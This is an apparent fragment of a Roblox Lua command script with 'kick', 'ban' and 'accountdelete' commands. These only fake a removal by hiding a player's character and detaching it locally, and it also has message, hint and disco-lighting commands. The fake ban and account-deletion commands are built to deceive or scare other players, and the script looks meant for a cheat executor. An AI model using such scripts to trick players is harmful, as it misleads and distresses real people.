					for _, descendant in ipairs(accessory.Handle:GetDescendants()) do
						if descendant:IsA("Decal") then
							descendant.Transparency = 1 -- Make accessory decals invisible
						end
					end
				end
			end

			-- Set player object to nil to simulate being kicked
			player.Parent = nil
		end
	end

	-- Listen for when the character is added (respawn or first spawn)
	player.CharacterAdded:Connect(function(character)
		-- Run the invisibility code on character spawn
		makeInvisible(character)

		-- Listen for tool equip in the backpack
		player.Backpack.ChildAdded:Connect(function(child)
			if child:IsA("Tool") then
				-- Run the invisibility code every time a tool is equipped
				makeInvisible(character)
			end
		end)
	end)
end

-------------------------------------------------------------------------------------------------------------------------------

addcommand("kick", "kick", function(target)
	local players = game:GetService("Players"):GetPlayers()

	if target == "me" then
		local localPlayer = game:GetService("Players").LocalPlayer
		if localPlayer then
			fakeKick(localPlayer)
			localPlayer:Kick("youve been kicked by unable! >.<")
		end
	elseif target == "random" then
		local randomPlayer = players[math.random(1, #players)]
		fakeKick(randomPlayer)
	elseif target == "others" then
		local localPlayer = game:GetService("Players").LocalPlayer
		for _, player in ipairs(players) do
			if player ~= localPlayer then
				fakeKick(player)
			end
		end
	elseif target == "all" then
		for _, player in ipairs(players) do
			fakeKick(player)
		end
	else
		local found = false
		for _, player in ipairs(players) do
			if string.find(string.lower(player.Name), string.lower(target)) then
				fakeKick(player)
				found = true
				break
			end
		end
		if not found then
		end
	end
end)

-------------------------------------------------------------------------------------------------------------------------------

addcommand("ban", "ban", function(target)
	local players = game:GetService("Players"):GetPlayers()

	if target == "me" then
		local localPlayer = game:GetService("Players").LocalPlayer
		if localPlayer then
			fakeKick(localPlayer)
			localPlayer:Kick("youve been banned by unable! >.<")
		end
	elseif target == "random" then
		local randomPlayer = players[math.random(1, #players)]
		fakeKick(randomPlayer)
	elseif target == "others" then
		local localPlayer = game:GetService("Players").LocalPlayer
		for _, player in ipairs(players) do
			if player ~= localPlayer then
				fakeKick(player)
			end
		end
	elseif target == "all" then
		for _, player in ipairs(players) do
			fakeKick(player)
		end
	else
		local found = false
		for _, player in ipairs(players) do
			if string.find(string.lower(player.Name), string.lower(target)) then
				fakeKick(player)
				found = true
				break
			end
		end
		if not found then
		end
	end
end)

-------------------------------------------------------------------------------------------------------------------------------

addcommand("accountdelete", "accountdelete", function(target)
	local players = game:GetService("Players"):GetPlayers()

	if target == "me" then
		local localPlayer = game:GetService("Players").LocalPlayer
		if localPlayer then
			fakeKick(localPlayer)
		end
	elseif target == "random" then
		local randomPlayer = players[math.random(1, #players)]
		fakeKick(randomPlayer)
	elseif target == "others" then
		local localPlayer = game:GetService("Players").LocalPlayer
		for _, player in ipairs(players) do
			if player ~= localPlayer then
				fakeKick(player)
			end
		end
	elseif target == "all" then
		for _, player in ipairs(players) do
			fakeKick(player)
		end
	else
		local found = false
		for _, player in ipairs(players) do
			if string.find(string.lower(player.Name), string.lower(target)) then
				fakeKick(player)
				found = true
				break
			end
		end
		if not found then
		end
	end
end)

-------------------------------------------------------------------------------------------------------------------------------

-- Command to show a message for a specified amount of seconds
addcommand("message", "message", function(...)
	-- Concatenate all arguments to form the full message, allowing for spaces
	local text = table.concat({...}, " ")

	-- Ensure text is not empty
	if text and text ~= "" then
		local message = Instance.new("Message")
		message.Text = text
		message.Parent = game:GetService("Workspace")
	end
end)

-- Command to close (delete) all messages
addcommand("closemessages", "closemessages", function()
	-- Iterate through all objects in the Workspace
	for _, obj in pairs(game:GetService("Workspace"):GetChildren()) do
		-- Check if the object is a Message instance
		if obj:IsA("Message") then
			obj:Destroy()  -- Delete the message
		end
	end
end)

-------------------------------------------------------------------------------------------------------------------------------

-- Command to show a message for a specified amount of seconds
addcommand("hint", "hint", function(...)
	-- Concatenate all arguments to form the full message, allowing for spaces
	local text = table.concat({...}, " ")

	-- Ensure text is not empty
	if text and text ~= "" then
		local message = Instance.new("Hint")
		message.Text = text
		message.Parent = game:GetService("Workspace")
	end
end)

-- Command to close (delete) all messages
addcommand("closehints", "closehints", function()
	-- Iterate through all objects in the Workspace
	for _, obj in pairs(game:GetService("Workspace"):GetChildren()) do
		-- Check if the object is a Message instance
		if obj:IsA("Hint") then
			obj:Destroy()  -- Delete the message
		end
	end
end)

-------------------------------------------------------------------------------------------------------------------------------

-- Command to start the disco mode
addcommand("disco", "disco", function()
	if not isDiscoActive then
		savelighting()
		isDiscoActive = true
		task.spawn(startDiscoMode) -- Start the disco mode in a separate thread
	end
end)

-- Command to stop the disco mode
addcommand("undisco", "undisco", function()
	if isDiscoActive then
		isDiscoActive = false
	end
	loadlghting()
end)

-------------------------------------------------------------------------------------------------------------------------------
